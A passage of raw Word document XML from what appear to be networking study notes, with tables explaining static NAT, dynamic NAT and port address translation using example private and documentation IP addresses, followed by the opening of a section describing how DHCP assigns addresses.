                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>Internal Mail Server</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="684A5116" w14:textId="226C5CCF" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>192.168.1.101</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="0615A052" w14:textId="2289BBD3" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>203.0.113.101</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00CE7F56" w14:paraId="5A7B8AD9" w14:textId="77777777" w:rsidTr="00CE7F56">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="4D480318" w14:textId="63AAECA4" w:rsidR="00CE7F56" w:rsidRPr="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>Internal FTP Server</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="2C3C5003" w14:textId="1F0EFADB" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>192.168.1.102</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="20D65B5C" w14:textId="6ED292DA" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>203.0.113.102</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="392D223F" w14:textId="3EC8E24E" w:rsidR="00CE7F56" w:rsidRPr="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7F56" w14:paraId="6AC14989" w14:textId="13879A20" w:rsidTr="002B5819">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="820" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D9717D3" w14:textId="38B40EED" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dynamic NAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53981C6F" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="330" w:hanging="219"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:t xml:space="preserve">Maps internal IPs to a </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE7F56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>pool of public IPs</w:t>
            </w:r>
            <w:r w:rsidRPr="00635069">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0879D19F" w14:textId="28D75B36" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="330" w:hanging="219"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:t>Mapping is created as needed and released when no longer in use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2103" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38623B33" w14:textId="49E877EE" w:rsidR="00CE7F56" w:rsidRPr="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="339" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:t>Available public IP pool: 203.0.113.100 - 203.0.113.110</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="055018DA" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="339" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:t>When devices connect:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C18613A" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="609" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:t>Laptop (192.168.1.50) gets 203.0.113.100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A077F5" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="609" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:t>Phone (192.168.1.51) gets 203.0.113.101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B1A04D8" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="609" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:t>Tablet (192.168.1.52) gets 203.0.113.102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54308781" w14:textId="5160012D" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="288"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="339" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:t>When laptop disconnects, 203.0.113.100 becomes available for others</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7F56" w14:paraId="400DB140" w14:textId="64CB3D72" w:rsidTr="002B5819">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="820" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="535A31AC" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port Address Translation (PAT) /</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538923C0" w14:textId="71CFFE43" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Overloading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F2708B0" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="287"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="330" w:hanging="219"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Many-to-one</w:t>
            </w:r>
            <w:r w:rsidRPr="00635069">
              <w:t xml:space="preserve"> mapping using ports (most common, aka "NAT overload").</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2D4F52" w14:textId="539BC252" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="287"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="330" w:hanging="219"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:t>Multiple internal devices share a single public IP, differentiated by port numbers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2103" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3CFE8273" w14:textId="77777777" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="287"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="339" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="002B5819">
              <w:t>All devices use same public IP: 203.0.113.5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C648DB6" w14:textId="77777777" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="287"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="339" w:hanging="270"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="002B5819">
              <w:t>Port differentiation:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="6661"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165"/>
              <w:gridCol w:w="2044"/>
            </w:tblGrid>
            <w:tr w:rsidR="002B5819" w14:paraId="366BE896" w14:textId="77777777" w:rsidTr="002B5819">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="0125D7DF" w14:textId="77777777" w:rsidR="002B5819" w:rsidRPr="00CE7F56" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="23D73C30" w14:textId="77777777" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r>
                    <w:t>Private IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="132CBD6E" w14:textId="77777777" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>Public IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B5819" w14:paraId="15B72936" w14:textId="77777777" w:rsidTr="002B5819">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="64C6867D" w14:textId="374DDBBD" w:rsidR="002B5819" w:rsidRPr="00CE7F56" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>Laptop browsing web</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="2F225037" w14:textId="1F81EA90" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>192.168.1.10:12345</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="526C098C" w14:textId="21430C8D" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>203.0.113.5:40001</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B5819" w14:paraId="3A157438" w14:textId="77777777" w:rsidTr="002B5819">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="2EB4BEEE" w14:textId="6297E1B8" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>Phone checking email</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="670D80C8" w14:textId="2403A54C" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>192.168.1.11:23456</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="0C126E13" w14:textId="5B593BCE" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>203.0.113.5:40002</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="002B5819" w14:paraId="6339C626" w14:textId="77777777" w:rsidTr="002B5819">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="64184D5A" w14:textId="682EB3C4" w:rsidR="002B5819" w:rsidRPr="00CE7F56" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>Tablet streaming video</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="135C5AB4" w14:textId="79847116" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>192.168.1.12:34567</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="5910592C" w14:textId="2E7C7646" w:rsidR="002B5819" w:rsidRDefault="002B5819" w:rsidP="002B5819">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="002B5819">
                    <w:t>203.0.113.5:40003</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="64013998" w14:textId="379AA610" w:rsidR="00CE7F56" w:rsidRPr="002B5819" w:rsidRDefault="00CE7F56" w:rsidP="002B5819">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D49016A" w14:textId="77777777" w:rsidR="0085692D" w:rsidRDefault="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D5B879" w14:textId="77777777" w:rsidR="00E9253D" w:rsidRDefault="00E9253D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4137FE83" w14:textId="2BBE16D3" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:lastRenderedPageBreak/>
        <w:t>Dynamic Host Configuration Protocol (DHCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604F156" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:t>Introduction to DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AB3E18" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3279EDFE" w14:textId="27014F00" w:rsidR="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:t xml:space="preserve">Dynamic Host Configuration Protocol (DHCP) is a network service that </w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automatically assigns IP addresses and other network configuration parameters to devices when they connect to a network</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56057F10" w14:textId="7E157804" w:rsidR="001C253C" w:rsidRPr="0085692D" w:rsidRDefault="001C253C" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001C253C">
        <w:t>OSI Layer: Application (Layer 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC09DC" w14:textId="6B318DB4" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:t xml:space="preserve">How </w:t>
      </w:r>
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t xml:space="preserve"> Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502F592" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:t>DHCP operates on a client-server model where DHCP servers maintain pools of available IP addresses and lease them to requesting clients:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93A1CD" w14:textId="0C5454C8" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B3256B" w14:textId="67AB52BD" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="009733BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Client </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00953178">
        <w:t>Client d</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>evice broadcasts DHCP Discover message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF3B96" w14:textId="0D389B21" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="009733BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Server </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>offer</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: DHCP server responds with available IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8DA86E" w14:textId="18FA46EB" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="009733BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Client </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00953178">
        <w:t xml:space="preserve">Client </w:t>
      </w:r>
      <w:r w:rsidR="00953178">
        <w:t xml:space="preserve">device </w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>requests the offered IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788373FA" w14:textId="1F8A5FA1" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="009733BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Server </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>acknowledgment</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: DHCP server confirms the lease</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66052CF0" w14:textId="77647959" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="009733BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>applied</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00953178">
        <w:t>Client d</w:t>
      </w:r>
      <w:r w:rsidR="00953178" w:rsidRPr="0085692D">
        <w:t xml:space="preserve">evice </w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>configures itself with received parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99DB69" w14:textId="6DE0B788" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="009733BE">
      <w:pPr>
